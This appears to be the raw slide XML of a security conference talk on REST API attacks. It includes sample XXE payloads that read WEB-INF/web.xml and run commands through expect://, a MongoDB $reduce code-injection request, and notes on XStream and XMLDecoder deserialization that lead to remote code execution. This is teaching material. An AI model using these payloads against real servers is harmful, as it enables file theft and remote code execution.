              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then POST the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	POST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svr.com:27080/test/_cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>With the following body: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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>={…, “$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reduce”:”function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious_code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}”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5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Input Types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know what the main input types are to REST interfaces?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Input Types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know what the main input types are to REST interfaces?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML 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3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Related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think of XML--what vulnerabilities come to mind?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REST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to the world in a PHD dissertation by Roy Fielding in 2000.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Promoted the idea of using HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request.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http://svr.com/customers/123 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://svr.com/customers/123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790825"/>
            <a:ext cx="6134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61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Related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think of XML--what vulnerabilities come to mind?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XXE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eXternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XML Entity Injection) / SSRF (Server Side Request Forgery)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSLT Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML Injection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XML Serialization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1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XXE (File Disclosure and Port Scanning)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Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: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&lt;?xml encoding=“utf-8” ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;!DOCTYPE Customer [&lt;!ENTITY y SYSTEM ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../WEB-INF/web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’&gt; ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;Customer&gt;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&gt;&amp;y;&lt;/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&lt;/Customer&gt;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*See Attacking &lt;?xml?&gt; processing by Nicolas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gregoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Agarri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) and XML Out-of-Band Data Retrieval by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Yunusov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Alexey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Osipov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9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XXE (Remote Code Execution)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Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: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&lt;?xml encoding=“utf-8” ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;!DOCTYPE Customer [&lt;!ENTITY y SYSTEM ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expect://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;Customer&gt;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&gt;&amp;y;&lt;/</a:t>
            </a:r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&lt;/Customer&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>*See XXE: advanced exploitation, d0znpp, ONSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>*expect protocol requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>pexpect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>module to be loaded in PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>joernchen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>another example at https://gist.github.com/joernchen/3623896</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149998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one time most REST frameworks were vulnerable to XXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But newer versions have patched this vulnerability.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulns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Every REST API allows the raw input of XML to be converted to native objects.  This deserialization process can be used to execute arbitrary code on the REST server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76793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XML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Three Mechanisms Used by Server Logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server looks where to go before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>going</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create an object based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on the target type defined in the application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> then assign values from the xml to that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/>
              <a:t>Server asks user where to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>go</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create and object based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on a user specified type in the provided XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>then assign values (to public or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fields) from the xml to that instance, finally cast the created object to the target type defined in the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Server asks user where to go and what to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create and object based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on a user specified type in the provided XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>then assign values from the xml to that instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow object assignments and invoke arbitrary methods on the newly created instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, finally cast the created object to the target type defined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467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Vulnerable XML Serialization APIs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our research we found one API that “asks the user where to go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XStream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More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>limited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot invoke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relies on existing APIs to trigger the code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And another that “asks the user where to go and what to do”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLDecoder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unrestricted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute arbitrary methods on newly created objects which are defined in the input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Near Turning complete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2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Remote Code Execution – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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XStreamRepresentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;bean id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xstreamMarshaller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class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>org.springframework.oxm.xstream.XStreamMarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;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Alvaro Munoz figured this out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199473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Remote Code Execution – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLDecoder</a:t>
            </a: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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>ew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ObjectRepresentation</a:t>
            </a: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Direct Usage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>*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err="1"/>
              <a:t>XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>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/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ByteArrayInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>bad_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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smtClean="0"/>
              <a:t>values </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>= (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>List&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>YourObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>dec.readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="507492" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="507492" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>you notice that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> file is processed by backend systems then you have a serious compromise by anyone who maliciously controls the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>XML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400" dirty="0"/>
              <a:t>Look for the following in your XML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="539496" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;java class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>java.beans.XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="539496" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;object class="Customer" id="Customer0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="539496" lvl="2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*Modified Version of code from the chapter “A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RESTful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> version of the Team Services” of “Java Web Services: Up and Running” by Martin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kalin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4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XML Serialization Remote Shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demos)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Causes of REST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Location in the trusted network of your data center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>History of REST Implementations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Server Side Request Forgery) to Internal REST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URLs to backend REST APIs are built with concatenation instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>URIBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Prepared URI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self describing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inbred Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extensions in REST frameworks that enhance development of REST functionality at the expense of security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incorrect assumptions of application behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input types and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ODATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… { “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” : “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>namespace.Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="1" indent="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arbtraryAttr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” : “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attackerProvidedValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, … }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="370332" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ruby on Rails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="662940" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>{ “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>json_class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” : “package::Class”,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/>
              <a:t>arbtraryAttr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” : “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attackerProvidedValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSON.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="662940" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“$type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” 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 smtClean="0"/>
              <a:t>namespace.Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arbtraryAttr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” : “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attackerProvidedValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="370332" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other frameworks work similarly</a:t>
            </a:r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1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ublically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>internal REST APIs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ease integration but can lead to framework specific vulnerabilities.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This talk gave you exposure to some of the common problems in REST based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Questions/Call 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9600" dirty="0" smtClean="0"/>
              <a:t>?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abraham.kang@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>hotmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>alvaro@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>pwntester.com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diniscruz_defcon@outlook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22336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7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Attacking An Internal Network (REST style)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3962400" cy="5211698"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Find an HTTP REST proxy w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Figure out which REST based systems are running on the internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfiltrate</a:t>
            </a:r>
